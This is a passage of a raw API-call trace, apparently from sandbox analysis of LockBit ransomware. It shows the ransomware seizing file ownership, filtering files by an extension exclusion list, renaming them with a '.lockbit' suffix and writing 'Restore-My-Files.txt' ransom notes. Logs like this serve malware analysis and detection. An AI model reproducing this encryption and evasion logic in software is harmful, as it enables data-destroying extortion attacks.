pSecurityDescriptor=0x3d6aa94) returned 1 [0091.142] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.142] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.142] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.143] CloseHandle (hObject=0x4b4) returned 1 [0091.143] free (_Block=0x2071008) [0091.143] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.143] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.143] malloc (_Size=0x40068) returned 0x3d70048 [0091.143] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6717684) returned 1 [0091.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.148] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.158] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.158] malloc (_Size=0xc0) returned 0x1ff1e60 [0091.158] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0091.202] free (_Block=0x1ff1e60) [0091.202] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.202] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.203] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.203] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71501adb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71501adb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5206f98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x673c74, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0091.203] lstrcmpiW (lpString1=".", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.203] lstrcmpiW (lpString1="..", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.203] PathFindExtensionW (pszPath="SportsNotesBackground_PAL.wmv") returned=".wmv" [0091.203] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.203] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.204] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.204] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.204] lstrcmpiW (lpString1="ntldr", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.204] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.205] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.205] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.205] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsNotesBackground_PAL.wmv") returned 1 [0091.205] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsNotesBackground_PAL.wmv") returned -1 [0091.205] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.205] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned=".wmv" [0091.205] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.205] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.205] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.206] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.206] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.206] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.206] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.206] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.lockbit") returned 89 [0091.206] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.208] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.209] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.210] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.211] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.212] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.212] RtlFreeAnsiString (AnsiString="\\") [0091.212] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.212] malloc (_Size=0x200) returned 0x2071008 [0091.212] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.212] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.212] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.212] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.213] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.213] CloseHandle (hObject=0x4b4) returned 1 [0091.213] free (_Block=0x2071008) [0091.213] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0091.214] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0091.214] malloc (_Size=0x40068) returned 0x3d70048 [0091.214] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6765684) returned 1 [0091.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0091.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0091.218] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.228] malloc (_Size=0xc8) returned 0x1ff1e60 [0091.228] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0091.262] free (_Block=0x1ff1e60) [0091.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.262] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.262] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.262] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x716a49da, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x716a49da, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x522f70cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca474, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsScenesBackground.wmv", cAlternateFileName="")) returned 1 [0091.262] lstrcmpiW (lpString1=".", lpString2="SportsScenesBackground.wmv") returned -1 [0091.262] lstrcmpiW (lpString1="..", lpString2="SportsScenesBackground.wmv") returned -1 [0091.262] PathFindExtensionW (pszPath="SportsScenesBackground.wmv") returned=".wmv" [0091.262] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.262] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.263] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.263] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] lstrcmpiW (lpString1="ntldr", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsScenesBackground.wmv") returned 1 [0091.264] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsScenesBackground.wmv") returned -1 [0091.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned=".wmv" [0091.264] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.264] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.264] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.265] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.265] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.lockbit") returned 86 [0091.265] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.266] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.267] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0091.267] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.268] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0091.269] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0091.269] RtlFreeAnsiString (AnsiString="\\") [0091.269] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0091.269] malloc (_Size=0x200) returned 0x2071008 [0091.269] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0091.269] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.269] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0091.269] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.270] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0091.270] CloseHandle (hObject=0x4b4) returned 1 [0091.270] free (_Block=0x2071008) [0091.270] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd 